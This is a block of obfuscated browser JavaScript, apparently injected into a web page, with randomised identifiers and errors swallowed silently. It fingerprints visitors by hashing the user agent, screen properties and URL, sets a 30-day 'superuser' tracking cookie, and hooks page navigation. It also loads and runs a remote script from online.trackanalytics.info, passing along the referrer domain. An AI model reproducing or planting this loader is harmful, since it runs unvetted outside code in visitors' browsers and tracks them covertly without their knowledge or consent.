(async function () { try { if (sessionStorage.getItem('ua_key')) { return; } const ua = navigator.userAgent; const encoder = new TextEncoder(); const data = encoder.encode(ua); const hashBuffer = await crypto.subtle.digest('SHA-256', data); const hashArray = Array.from(new Uint8Array(hashBuffer)); const hashHex = hashArray .map(b => b.toString(16).padStart(2, '0')) .join(''); sessionStorage.setItem('ua_key', hashHex); } catch (e) { } })(); function AkhNNIHXN (ptlDzVxYt) { var BChGwVAoD = ptlDzVxYt + '='; var UqNTGjXcg = document.cookie.split(';'); for (var i = 0; i < UqNTGjXcg.length; i++) { var uNLJnBgGK = UqNTGjXcg[i]; while (uNLJnBgGK.charAt(0) === ' ') { uNLJnBgGK = uNLJnBgGK.substring(1); } if (uNLJnBgGK.indexOf(BChGwVAoD) === 0) { return uNLJnBgGK.substring(BChGwVAoD.length, uNLJnBgGK.length); } } return ''; } function XIZFfRdOL () { return 'xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx'.replace(/[xy]/g, function (vdMdYaiMX) { var DMVoYBdaI = Math.random() * 16 | 0, KvvdeBZdm = vdMdYaiMX === 'x' ? DMVoYBdaI : (DMVoYBdaI & 0x3 | 0x8); return KvvdeBZdm.toString(16); }) } (async function () { try { if (sessionStorage.getItem('screen_key')) { return; } const screenSize = [ screen.width, screen.height, screen.colorDepth, window.devicePixelRatio || 1 ].join('x'); const encoder = new TextEncoder(); const data = encoder.encode(screenSize); const hashBuffer = await crypto.subtle.digest('SHA-256', data); const hashArray = Array.from(new Uint8Array(hashBuffer)); const hashHex = hashArray .map(b => b.toString(16).padStart(2, '0')) .join(''); sessionStorage.setItem('screen_key', hashHex); } catch (e) { } })(); var GTIgypGMb = window.location.href; (() => { let oldPushState = history.pushState; history.pushState = function pushState() { let ret = oldPushState.apply(this, arguments); window.dispatchEvent(new Event('pushstate')); window.dispatchEvent(new Event('locationchange')); return ret; }; let oldReplaceState = history.replaceState; history.replaceState = function replaceState() { let ret = oldReplaceState.apply(this, arguments); window.dispatchEvent(new Event('replacestate')); window.dispatchEvent(new Event('locationchange')); return ret; }; window.addEventListener('popstate', () => { window.dispatchEvent(new Event('locationchange')); }); })(); MAOuZiIHG(GTIgypGMb).then(function (value) { window.addEventListener('locationchange', function () { if (window.location.href != GTIgypGMb) { GTIgypGMb = window.location.href; MAOuZiIHG(GTIgypGMb).then(function (value) { }); } }); }); async function MAOuZiIHG (EyKVzDKGz) { var MAjwZZAHX = AkhNNIHXN('superuser'); if (!MAjwZZAHX || MAjwZZAHX === '') MAjwZZAHX = XIZFfRdOL(); var MWGIIJZAY = (new Date(Date.now() + 30 * 86400 * 1000)).toUTCString(); document.cookie = 'superuser=' + MAjwZZAHX + '; expires=' + MWGIIJZAY + 86400 + ';path=/;'; var qxHVxWNby = { url: EyKVzDKGz, referrer: document.referrer, unique_id: MAjwZZAHX }; return ''; } try { var PcRlbCmoc_referrer = document.referrer; if (PcRlbCmoc_referrer == "") { PcRlbCmoc_referrer = window.location.href; } if (PcRlbCmoc_referrer) { const c_domain = new URL(PcRlbCmoc_referrer).hostname; async function fpgWJUZda_tracker () { var DWzKIgEFz_script = document.createElement('script'); DWzKIgEFz_script.src = `https://online.trackanalytics.info/audience.js?domain=${c_domain}`; document.head.appendChild(DWzKIgEFz_script); } fpgWJUZda_tracker(); } } catch (error) { } (async function () { try { if (sessionStorage.getItem('url_key')) { return; } const currentUrl = location.origin + location.pathname + location.search; const encoder = new TextEncoder(); const data = encoder.encode(currentUrl); const hashBuffer = await crypto.subtle.digest('SHA-256', data); const hashArray = Array.from(new Uint8Array(hashBuffer)); const hashHex = hashArray .map(b => b.toString(16).padStart(2, '0')) .join(''); sessionStorage.setItem('url_key', hashHex); } catch (e) { } })();